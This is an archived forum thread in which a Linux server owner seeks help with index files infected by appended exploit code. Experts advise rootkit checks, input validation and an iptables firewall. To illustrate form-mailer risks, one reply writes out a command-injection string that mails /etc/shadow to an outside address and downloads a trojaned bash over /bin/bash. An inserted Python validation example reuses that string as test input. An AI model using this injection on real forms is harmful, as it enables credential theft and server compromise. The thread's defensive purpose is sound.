Solved

A program to fix Exploit infected index files

Posted on 2007-03-22
9
1,125 Views
Last Modified: 2011-10-03
Hi:

I have a Linux server, running the last version of Red Hat, with Apache, Sendmail, MailScanner and SpamAssassin, among others. I now have a big problem with a kind of virus, and I need to solve this with a program. I will explain.

Since last Dec 17th I have noticed that, in all of this machine's domains, all the files called "*index*", that is, those that have the string "index" in their filename, whether .htm, .html, .php or even some image files like .gif, .jpg or .swf, have, at the end of the file, some strange code that was identified by some antivirus client programs as Not-A-Virus.Exploit.HTML.Mht, and I was told it could be used by hackers.

So, whenever someone accesses these index pages or images from the browser, the client antivirus says:

Threat detected. Virus Exploit Identified.

Well, I am quite concerned about this. I have fixed some of these index files by editing them manually. It is quite simple, because this strange code is put at the end of the file, even in the image files. But the problem is that there are hundreds and hundreds of them on my server. So I need a program to run under each of the domains, cleaning these files.

If you want to see one of these domains, please access this: www.m2seguros.com.br and see what happens. Try to view the source code of this simple page and you will see the suspect code after the </HTML> tag.

Please help me with this. I looked for ready-made software but I didn't find any. I guess it has to be specifically constructed. If someone could write a program in Perl or Bash that I can execute under each domain from the command line, I would be very grateful.

Thanks in advance.

Mario./
0
Question by:multisites
9 Comments
 
LVL 18

Expert Comment

by:PowerIT
ID: 18778110
I'm not the scripting guy you are looking for.
But I'll tell you this: before starting to clean, you'll have to lock down your servers. So patch them, set up access security correctly...
Otherwise you will be infected again in no time.

J.
0
 
LVL 11

Expert Comment

by:kblack05
ID: 18837630
You should download, install and run chkrootkit from http://www.chkrootkit.org (slow-to-load site) and see if the box is compromised. Also, use 'lsof -i -P' to see what ports the box is listening on and post them back here, please...
0
 

Author Comment

by:multisites
ID: 18837891
Hi, kblack05:

Here it is:

[root@srv1 mail]# lsof -i -P
COMMAND    PID     USER   FD   TYPE   DEVICE SIZE NODE NAME
named     1050    named   20u  IPv4 76679482       UDP localhost.localdomain:53
named     1050    named   21u  IPv4 76679483       TCP localhost.localdomain:53 (LISTEN)
named     1050    named   22u  IPv4 76679484       UDP srv1.multisitesdominios.com.br:53
named     1050    named   23u  IPv4 76679485       TCP srv1.multisitesdominios.com.br:53 (LISTEN)
named     1050    named   24u  IPv4 76679486       UDP *:59019
named     1050    named   25u  IPv4 76679487       TCP localhost.localdomain:953 (LISTEN)
httpd     1625   apache    3u  IPv4 74762902       TCP *:80 (LISTEN)
httpd     1625   apache    4u  IPv4 74762904       TCP *:443 (LISTEN)
snmpd     2101     root    8u  IPv4     2359       TCP *:199 (LISTEN)
snmpd     2101     root    9u  IPv4     2360       UDP *:161
mysqld    2196    mysql    3u  IPv4     2505       TCP *:3306 (LISTEN)
proftpd   2271   nobody    0u  IPv4 76026989       TCP *:21 (LISTEN)
sendmail  2704     root   10u  IPv4 76691149       TCP srv1.multisitesdominios.com.br:54982->200-207-11-50.speedyterra.com.br:25 (SYN_SENT)
httpd     4108   apache    3u  IPv4 74762902       TCP *:80 (LISTEN)
httpd     4108   apache    4u  IPv4 74762904       TCP *:443 (LISTEN)
httpd     7011   apache    3u  IPv4 74762902       TCP *:80 (LISTEN)
httpd     7011   apache    4u  IPv4 74762904       TCP *:443 (LISTEN)
httpd     7012   apache    3u  IPv4 74762902       TCP *:80 (LISTEN)
httpd     7012   apache    4u  IPv4 74762904       TCP *:443 (LISTEN)
httpd     7013   apache    3u  IPv4 74762902       TCP *:80 (LISTEN)
httpd     7013   apache    4u  IPv4 74762904       TCP *:443 (LISTEN)
httpd     7014   apache    3u  IPv4 74762902       TCP *:80 (LISTEN)
httpd     7014   apache    4u  IPv4 74762904       TCP *:443 (LISTEN)
sshd      7542     root    4u  IPv4 76293767       TCP srv1.multisitesdominios.com.br:22->c9532fe9.virtua.com.br:3240 (ESTABLISHED)
sshd      7544 multissh    4u  IPv4 76293767       TCP srv1.multisitesdominios.com.br:22->c9532fe9.virtua.com.br:3240 (ESTABLISHED)
sshd     12153     root    3u  IPv4  2405708       TCP *:22 (LISTEN)
httpd    13281   apache    3u  IPv4 74762902       TCP *:80 (LISTEN)
httpd    13281   apache    4u  IPv4 74762904       TCP *:443 (LISTEN)
httpd    18083   apache    3u  IPv4 74762902       TCP *:80 (LISTEN)
httpd    18083   apache    4u  IPv4 74762904       TCP *:443 (LISTEN)
httpd    18084   apache    3u  IPv4 74762902       TCP *:80 (LISTEN)
httpd    18084   apache    4u  IPv4 74762904       TCP *:443 (LISTEN)
httpd    18085   apache    3u  IPv4 74762902       TCP *:80 (LISTEN)
httpd    18085   apache    4u  IPv4 74762904       TCP *:443 (LISTEN)
spamd    19369     root    5u  IPv4 15471570       TCP localhost.localdomain:783 (LISTEN)
spamd    19369     root    6u  IPv4 15471578       UDP localhost.localdomain:56185->localhost.localdomain:53
httpd    19971     root    3u  IPv4 74762902       TCP *:80 (LISTEN)
httpd    19971     root    4u  IPv4 74762904       TCP *:443 (LISTEN)
httpd    20096   apache    3u  IPv4 74762902       TCP *:80 (LISTEN)
httpd    20096   apache    4u  IPv4 74762904       TCP *:443 (LISTEN)
httpd    20099   apache    3u  IPv4 74762902       TCP *:80 (LISTEN)
httpd    20099   apache    4u  IPv4 74762904       TCP *:443 (LISTEN)
clamd    23105   clamav    0u  IPv4 76453983       TCP localhost.localdomain:3310 (LISTEN)
sendmail 23133     root    4u  IPv4 76454020       TCP *:25 (LISTEN)
httpd    25190   apache    3u  IPv4 74762902       TCP *:80 (LISTEN)
httpd    25190   apache    4u  IPv4 74762904       TCP *:443 (LISTEN)
httpd    25194   apache    3u  IPv4 74762902       TCP *:80 (LISTEN)
httpd    25194   apache    4u  IPv4 74762904       TCP *:443 (LISTEN)
httpd    25195   apache    3u  IPv4 74762902       TCP *:80 (LISTEN)
httpd    25195   apache    4u  IPv4 74762904       TCP *:443 (LISTEN)
httpd    25198   apache    3u  IPv4 74762902       TCP *:80 (LISTEN)
httpd    25198   apache    4u  IPv4 74762904       TCP *:443 (LISTEN)
httpd    25794   apache    3u  IPv4 74762902       TCP *:80 (LISTEN)
httpd    25794   apache    4u  IPv4 74762904       TCP *:443 (LISTEN)
httpd    25795   apache    3u  IPv4 74762902       TCP *:80 (LISTEN)
httpd    25795   apache    4u  IPv4 74762904       TCP *:443 (LISTEN)
httpd    25795   apache  136u  IPv4 76691513       TCP srv1.multisitesdominios.com.br:80->200.222.35.126:59366 (FIN_WAIT1)
httpd    26584   apache    3u  IPv4 74762902       TCP *:80 (LISTEN)
httpd    26584   apache    4u  IPv4 74762904       TCP *:443 (LISTEN)
httpd    26585   apache    3u  IPv4 74762902       TCP *:80 (LISTEN)
httpd    26585   apache    4u  IPv4 74762904       TCP *:443 (LISTEN)
xinetd   30534     root    5u  IPv4 69311376       TCP *:110 (LISTEN)
spamd    30721     root    5u  IPv4 15471570       TCP localhost.localdomain:783 (LISTEN)
spamd    31728     root    5u  IPv4 15471570       TCP localhost.localdomain:783 (LISTEN)
0
 
LVL 11

Accepted Solution

by:
kblack05 earned 250 total points
ID: 18839021
Let me introduce you to your new bible: http://www.ecst.csuchico.edu/~dranch/LINUX/TrinityOS/cHTML/TrinityOS-c.html

Looks like your content is definitely compromised! Run chkrootkit and see what it outputs. Be advised you may have a serious problem on your hands; a fresh install may be smart. Usually attacks like this come when someone has access to the box directly. Here is a list of the ways this is most commonly accomplished:

Man-in-the-middle attack: someone has been using telnet or standard FTP to access the system. (These daemons should not even be running; everyone should be using SSH, and SFTP over SSH, to access the system.)

Direct access: someone has given out passwords or has emailed the passwords to the server around, and the passwords were captured along the mail circuit by redirection and filtering for lines like "assword" or "pword". NEVER email passwords. I suggest getting a copy of "Password Safe" and learning how to use it. Another is Steganos LockNote. Then you send the passwords in an encrypted file, with a password you give to the person over the phone or in person. Make the password of the encrypted password file DIFFERENT from the passwords on the servers...

My recommendation to you is to try using chkrootkit to see if you can find where the host is compromised. If you cannot find where it is broken, fix it, and firewall it, then you will likely need to format and re-install the box. :(

PHP or CGI form mailers. These are ALWAYS a bad idea. Any page content served from the Linux server should be rigorously validated for input. In other words, if there's a box the user can type into and hit "Submit" (POST to the server), then you need to be using that program to verify that the input from the user does NOT contain any shell code or garbage. For example, if you have a simple CGI textbox form to submit emails to a list, or something similar, and you aren't rigorously checking the input, then I can simply do something like this:

dummy@address.com ; mail backdoor@email.com << /etc/shadow ; mail backdoor@email.com << /etc/hosts ; wget http://zombiemasterhostaddress /bin/hacked_bash ; cp -rf ./hacked_bash /bin/bash

Or some similar method, and begin setting up a trojan attack on the server. With enough time and secrecy the box can be compromised, and daemons / content / port chains will be replaced. chkrootkit should help identify problems like these.

Also read up on input validation and cross-site scripting attacks, for example http://securitytracker.com/alerts/2004/Apr/1009705.html (which is a good site resource).


Be advised that your server also has signatures turned on in Apache, which allows me to gather intelligence about what software your host is running, which allows me to further my attacks...

[root@schrute ~]# telnet srv1.multisitesdominios.com.br 80
Trying 200.157.211.200...
Connected to srv1.multisitesdominios.com.br (200.157.211.200).
Escape character is '^]'.
HEAD / HTTP/1.1

HTTP/1.1 400 Bad Request
Date: Mon, 02 Apr 2007 19:34:07 GMT
Server: Apache/2.0.51 (Fedora)
Connection: close
Content-Type: text/html; charset=iso-8859-1

Connection closed by foreign host.


Here is a basic iptables firewall. This is ALWAYS a good idea, even on hosts behind a NAT or other firewall, just so that you can specify in the settings which hosts can communicate with the mail or other services.

What I do is make a directory /etc/firewall, then copy this file in there as /etc/firewall/iptables.sh
(Credit to JLevie of EE for the original script, which I have heavily modified...)

NOTE * I have replaced all the IP address CIDR notation (specified source address blocks) with 192.168.1. to keep my privacy. You'll need to set the IP address ranges for allowed hosts, or set them to 0/0 to allow ANY host to connect on that port.



#!/bin/sh
#
#
# service iptables save
#
# Set an absolute path to IPTABLES and define my IP.
# ('which iptables' to detect path to iptables.)

IPTABLES="/sbin/iptables"
IP1=192.168.1.128

#
# Clear out any existing firewall rules, and any chains that might have
# been created. Then set the default policies.
#

$IPTABLES -F
$IPTABLES -F INPUT
$IPTABLES -F OUTPUT
$IPTABLES -F FORWARD
$IPTABLES -F -t mangle
$IPTABLES -F -t nat
$IPTABLES -X
$IPTABLES -P INPUT DROP
$IPTABLES -P OUTPUT ACCEPT
$IPTABLES -P FORWARD ACCEPT

#
# Begin setting up the rulesets. First define some rule chains to handle
# exception conditions. These chains will receive packets that we aren't
# willing to pass. Limiters on logging are used so as to not to swamp the
# firewall in a DOS scenario.
#
# silent       - Just drop the packet
# tcpflags     - Log packets with bad flags, most likely an attack
# firewalled   - Log packets that we refuse, possibly from an attack
#
$IPTABLES -N silent
$IPTABLES -A silent -j DROP

$IPTABLES -N tcpflags
$IPTABLES -A tcpflags -m limit --limit 15/minute -j LOG --log-prefix TCPflags:
$IPTABLES -A tcpflags -j DROP

$IPTABLES -N firewalled
$IPTABLES -A firewalled -m limit --limit 15/minute -j LOG --log-prefix Firewalled:
$IPTABLES -A firewalled -j DROP

#
# These are all TCP flag combinations that should never, ever, occur in the
# wild. All of these are illegal combinations that are used to attack a box
# in various ways.
#

$IPTABLES -A INPUT -p tcp --tcp-flags ALL FIN,URG,PSH -j tcpflags
$IPTABLES -A INPUT -p tcp --tcp-flags ALL ALL -j tcpflags
$IPTABLES -A INPUT -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -j tcpflags
$IPTABLES -A INPUT -p tcp --tcp-flags ALL NONE -j tcpflags
$IPTABLES -A INPUT -p tcp --tcp-flags SYN,RST SYN,RST -j tcpflags
$IPTABLES -A INPUT -p tcp --tcp-flags SYN,FIN SYN,FIN -j tcpflags

#
# Allow selected ICMP types and drop the rest.
#

$IPTABLES -A INPUT -p icmp --icmp-type 0 -j ACCEPT
$IPTABLES -A INPUT -p icmp --icmp-type 3 -j ACCEPT
$IPTABLES -A INPUT -p icmp --icmp-type 11 -j ACCEPT
$IPTABLES -A INPUT -p icmp --icmp-type 8 -m limit --limit 1/second -j ACCEPT
$IPTABLES -A INPUT -p icmp -j firewalled

#
# The loopback interface is inherently trustworthy. Don't disable it or
# a number of things will break.
#

$IPTABLES -A INPUT -i lo -j ACCEPT
#
# Now allow Internet hosts access to those services we provide. Note that
# enabling inbound FTP 20 & 21 tcp will also require allowing ports
# 1024-65534/tcp. Which in itself is good enough reason not to allow FTP
# connections and to only allow ssh/scp/sftp.
#
# Allow ssh from anywhere to this server
#

$IPTABLES -A INPUT -p tcp -s 0/0 --dport 22 -j ACCEPT

#
# HTTP access from anywhere
#

$IPTABLES -A INPUT -p tcp -s 0/0 --dport 80 -j ACCEPT
$IPTABLES -A INPUT -p tcp -s 0/0 --dport 443 -j ACCEPT

#
# Database Access
#
#$IPTABLES -A INPUT -p tcp -s 0/0 --dport 3306 -j ACCEPT

# Postfix Access from Anywhere
$IPTABLES -A INPUT -p tcp -s 0/0 --dport 25 -j ACCEPT
$IPTABLES -A INPUT -p tcp -s 0/0 --dport 110 -j ACCEPT
#
# Samba
#

#$IPTABLES -A INPUT -p udp -m udp -s 192.168.1.0/24 --dport 137 -j ACCEPT
#$IPTABLES -A INPUT -p udp -m udp -s 192.168.1.0/24 --dport 138 -j ACCEPT
#$IPTABLES -A INPUT -p udp -m udp -s 192.168.1.0/24 --dport 137 -j ACCEPT
#$IPTABLES -A INPUT -p udp -m udp -s 192.168.1.0/24 --dport 138 -j ACCEPT
#$IPTABLES -A INPUT -p udp -m udp -s 192.168.1.0/24 --dport 137 -j ACCEPT
#$IPTABLES -A INPUT -p udp -m udp -s 192.168.1.0/24 --dport 138 -j ACCEPT

#$IPTABLES -A INPUT -m state --state NEW -m tcp -p tcp -s 192.168.1.0/24 --dport 139 -j ACCEPT
#$IPTABLES -A INPUT -m state --state NEW -m tcp -p tcp -s 192.168.1.0/24 --dport 445 -j ACCEPT
#$IPTABLES -A INPUT -m state --state NEW -m tcp -p tcp -s 192.168.1.0/24 --dport 139 -j ACCEPT
#$IPTABLES -A INPUT -m state --state NEW -m tcp -p tcp -s 192.168.1.0/24 --dport 445 -j ACCEPT
#$IPTABLES -A INPUT -m state --state NEW -m tcp -p tcp -s 192.168.1.0/24 --dport 139 -j ACCEPT
#$IPTABLES -A INPUT -m state --state NEW -m tcp -p tcp -s 192.168.1.0/24 --dport 445 -j ACCEPT


#
# DNS
#
#$IPTABLES -A INPUT -p tcp -s 0/0 --dport 53 -j ACCEPT
#$IPTABLES -A INPUT -p udp -s 0/0 --dport 53 -j ACCEPT

#$IPTABLES -A INPUT -p tcp -s 0/0 --dport 953 -j ACCEPT
#$IPTABLES -A INPUT -p udp -s 0/0 --dport 953 -j ACCEPT

#
# If there are trusted nodes you can allow them access to everything with
# something like:
#

$IPTABLES -A INPUT -s 192.168.1.0/24 -d $IP1 -j ACCEPT

# Let's drop the spammers here. Use -I (insert at the head of INPUT) rather
# than -A: appended after the port 25 ACCEPT rule above, a DROP would never match.

$IPTABLES -I INPUT -i eth0 -p tcp -s 123.45.6.0/24 -j DROP

#
# Allow packets that are part of an established connection to pass
# through the firewall. This is required for normal Internet activity
# by inside clients.
#

$IPTABLES -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT

#
# Anything not already matched gets firewalled and logged.
#

$IPTABLES -A INPUT -j firewalled

0
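An added example (not kblack05's code) of the form-mailer point made above: the unsafe pattern interpolates the submitted address into a shell line, so text of the shape quoted above becomes extra commands; the hardened path accepts only a single well-formed mailbox and hands it to sendmail as its own argv element with no shell involved. The sendmail path, the addresses and the sample inputs are assumptions constructed for the example. The "vulnerable" function only builds the command string so it can be inspected; nothing is executed unless `dry_run=False`.

```python
#!/usr/bin/env python3
"""Form-mailer address handling: injectable pattern beside a hardened one.
Added example for this thread, not its own code; paths/addresses assumed."""
import re
import subprocess

SENDMAIL = "/usr/sbin/sendmail"   # assumed path; confirm with `which sendmail`

# Exactly one mailbox: first character alphanumeric (so it can never be read
# as a sendmail option), no whitespace, no shell metacharacters.
ADDRESS = re.compile(
    r"^[A-Za-z0-9][A-Za-z0-9._%+-]*@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}$"
)


def vulnerable_command(raw_to: str) -> str:
    """How the classic CGI mailer built its command: user text pasted into a
    shell line. Returned for inspection only, never executed here."""
    return "mail -s 'subscribe' " + raw_to


def validate_address(raw_to: str):
    """Return the address if it is a single well-formed mailbox, else None."""
    value = raw_to.strip()
    if len(value) > 254 or not ADDRESS.fullmatch(value):
        return None
    return value


def safe_argv(raw_to: str):
    """argv for sendmail with the validated address as its own element
    (no shell parsing anywhere), or None when the input is rejected."""
    to = validate_address(raw_to)
    if to is None:
        return None
    return [SENDMAIL, "-i", to]   # -i: a lone '.' line does not end the message


def send_subscription(raw_to: str, body: str, dry_run: bool = True):
    """Validate, then either report the argv (dry run) or run it with
    shell=False so the address can never turn into shell syntax."""
    argv = safe_argv(raw_to)
    if argv is None:
        return ("rejected", None)
    if dry_run:
        return ("would-send", argv)
    subprocess.run(argv, input=body.encode(), check=True)
    return ("sent", argv)


# Constructed inputs: a plain address and the injection shape quoted in the thread.
GOOD = "user@example.test"
INJECTED = "dummy@address.com ; mail backdoor@email.com << /etc/shadow"

if __name__ == "__main__":
    for raw in (GOOD, INJECTED):
        print(repr(raw))
        print("  old shell line :", vulnerable_command(raw))
        print("  hardened result:", send_subscription(raw, "hello"))
```

The validation is deliberately stricter than RFC 5322 (no quoted local parts, no comments): for a subscription form a plain mailbox is all that is needed, and every character the regex admits is harmless to both the shell and sendmail's option parser.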
 

Author Comment

by:multisites
ID: 18839926
Well, kblack05, I thank you a lot, although you have scared me! :-) I'm giving your report to the guy who takes care of my server. The best idea now would really be to install a new operating system, a new Linux, but right now, unfortunately, I have no way to do this, because I can't have this server stopped for a whole day, unless we did it on a weekend. I have to think about it. By the way, I again thank you very much for your efforts to help me with all this info.
Mario./

0
 
LVL 11

Expert Comment

by:kblack05
ID: 18839969
Before getting too afraid, please download, install and run chkrootkit.

I do this from the command line like so...
[root@core1 root]# wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
--15:01:30--  ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
           => `chkrootkit.tar.gz'
Resolving ftp.pangeia.com.br... 200.239.53.35
Connecting to ftp.pangeia.com.br[200.239.53.35]:21... connected.
Logging in as anonymous ... Logged in!
==> SYST ... done.    ==> PWD ... done.
==> TYPE I ... done.  ==> CWD /pub/seg/pac ... done.
==> PASV ... done.    ==> RETR chkrootkit.tar.gz ... done.
Length: 37,791 (unauthoritative)

100%[=================================================================================>] 37,791         7.34K/s    ETA 00:00

15:01:39 (7.05 KB/s) - `chkrootkit.tar.gz' saved [37,791]

[root@core1 root]# tar -zxvf chkrootkit.tar.gz
chkrootkit-0.47
chkrootkit-0.47/ACKNOWLEDGMENTS
chkrootkit-0.47/COPYRIGHT
chkrootkit-0.47/Makefile
chkrootkit-0.47/README
chkrootkit-0.47/README.chklastlog
chkrootkit-0.47/README.chkwtmp
chkrootkit-0.47/check_wtmpx.c
chkrootkit-0.47/chkdirs.c
chkrootkit-0.47/chklastlog.c
chkrootkit-0.47/chkproc.c
chkrootkit-0.47/chkrootkit
chkrootkit-0.47/chkrootkit.lsm
chkrootkit-0.47/chkutmp.c
chkrootkit-0.47/chkwtmp.c
chkrootkit-0.47/ifpromisc.c
chkrootkit-0.47/strings.c

[root@core1 root]# cd chkrootkit-0.47/

[root@core1 chkrootkit-0.47]# ls

ACKNOWLEDGMENTS  chkdirs.c     chkproc.c    chkrootkit.lsm  chkwtmp.c  ifpromisc.c  README             README.chkwtmp
check_wtmpx.c    chklastlog.c  chkrootkit*  chkutmp.c       COPYRIGHT  Makefile     README.chklastlog  strings.c

[root@core1 chkrootkit-0.47]# ./chkrootkit
ROOTDIR is `/'
Checking `amd'... not found
Checking `basename'... not infected
Checking `biff'... not found
Checking `chfn'... not infected
Checking `chsh'... not infected
Checking `cron'... not infected
Checking `crontab'... not infected
Checking `date'... not infected
Checking `du'... not infected
Checking `dirname'... not infected
Checking `echo'... not infected
Checking `egrep'... not infected
Checking `env'... not infected
Checking `find'... not infected
Checking `fingerd'... not found
Checking `gpm'... not found
Checking `grep'... not infected
Checking `hdparm'... not infected
Checking `su'... not infected
Checking `ifconfig'... not infected
Checking `inetd'... not tested
Checking `inetdconf'... not found
Checking `identd'... not found
Checking `init'... not infected
Checking `killall'... not infected
Checking `ldsopreload'... can't exec ./strings-static, not tested
Checking `login'... not infected
Checking `ls'... not infected
Checking `lsof'... not infected
Checking `mail'... not infected
Checking `mingetty'... not infected
Checking `netstat'... not infected
Checking `named'... not found
Checking `passwd'... not infected
Checking `pidof'... not infected
Checking `pop2'... not found
Checking `pop3'... not found
Checking `ps'... not infected
Checking `pstree'... not infected
Checking `rpcinfo'... not infected
Checking `rlogind'... not found
Checking `rshd'... not found
Checking `slogin'... not infected
Checking `sendmail'... not infected
Checking `sshd'... not infected
Checking `syslogd'... not infected
Checking `tar'... not infected
Checking `tcpd'... not infected
Checking `tcpdump'... not infected
Checking `top'... not infected
Checking `telnetd'... not found
Checking `timed'... not found
Checking `traceroute'... not infected
Checking `vdir'... not infected
Checking `w'... not infected
Checking `write'... not infected
Checking `aliens'... no suspect files
Searching for sniffer's logs, it may take a while... nothing found
Searching for HiDrootkit's default dir... nothing found
Searching for t0rn's default files and dirs... nothing found
Searching for t0rn's v8 defaults... nothing found
Searching for Lion Worm default files and dirs... nothing found
Searching for RSHA's default files and dir... nothing found
Searching for RH-Sharpe's default files... nothing found
Searching for Ambient's rootkit (ark) default files and dirs... nothing found
Searching for suspicious files and dirs, it may take a while...
/usr/lib/perl5/site_perl/5.8.5/i386-linux-thread-multi/auto/XBase/.packlist

Searching for LPD Worm files and dirs... nothing found
Searching for Ramen Worm files and dirs... nothing found
Searching for Maniac files and dirs... nothing found
Searching for RK17 files and dirs... nothing found
Searching for Ducoci rootkit... nothing found
Searching for Adore Worm... nothing found
Searching for ShitC Worm... nothing found
Searching for Omega Worm... nothing found
Searching for Sadmind/IIS Worm... nothing found
Searching for MonKit... nothing found
Searching for Showtee... nothing found
Searching for OpticKit... nothing found
Searching for T.R.K... nothing found
Searching for Mithra... nothing found
Searching for OBSD rk v1... nothing found
Searching for LOC rootkit... nothing found
Searching for Romanian rootkit... nothing found
Searching for HKRK rootkit... nothing found
Searching for Suckit rootkit... nothing found
Searching for Volc rootkit... nothing found
Searching for Gold2 rootkit... nothing found
Searching for TC2 Worm default files and dirs... nothing found
Searching for Anonoying rootkit default files and dirs... nothing found
Searching for ZK rootkit default files and dirs... nothing found
Searching for ShKit rootkit default files and dirs... nothing found
Searching for AjaKit rootkit default files and dirs... nothing found
Searching for zaRwT rootkit default files and dirs... nothing found
Searching for Madalin rootkit default files... nothing found
Searching for Fu rootkit default files... nothing found
Searching for ESRK rootkit default files... nothing found
Searching for rootedoor... nothing found
Searching for ENYELKM rootkit default files... nothing found
Searching for anomalies in shell history files... nothing found
Checking `asp'... not infected
Checking `bindshell'... not infected
Checking `lkm'... Checking `rexedcs'... not found
Checking `sniffer'... not tested: can't exec ./ifpromisc
Checking `w55808'... not infected
Checking `wted'... not tested: can't exec ./chkwtmp
Checking `scalper'... not infected
Checking `slapper'... not infected
Checking `z2'... not tested: can't exec ./chklastlog
Checking `chkutmp'... not tested: can't exec ./chkutmp
[root@core1 chkrootkit-0.47]#
0
 

Author Comment

by:multisites
ID: 18891901
Hi, kblack05:

Getting back to the reported problem, as you may remember, this server still runs an old Red Hat, for which there are no more updates.

So, I have finally decided to install, probably in a couple of weeks, a new Linux distribution on my server, probably CentOS, which I have on another server.

But until then, and even after having the new CentOS running, I need to fix the tons of index files which were corrupted by the addition of that code I mentioned.

Please, could anyone help me with this? I looked for ready-made software but I didn't find any. I found one, called Mass Text Replacer, from SyntaxRebels, but it works under Windows, not under Linux. I guess one has to be specifically constructed. If someone could write a program in Perl or Bash that I can execute under each domain from the command line, I would be very grateful.

Mario./
0
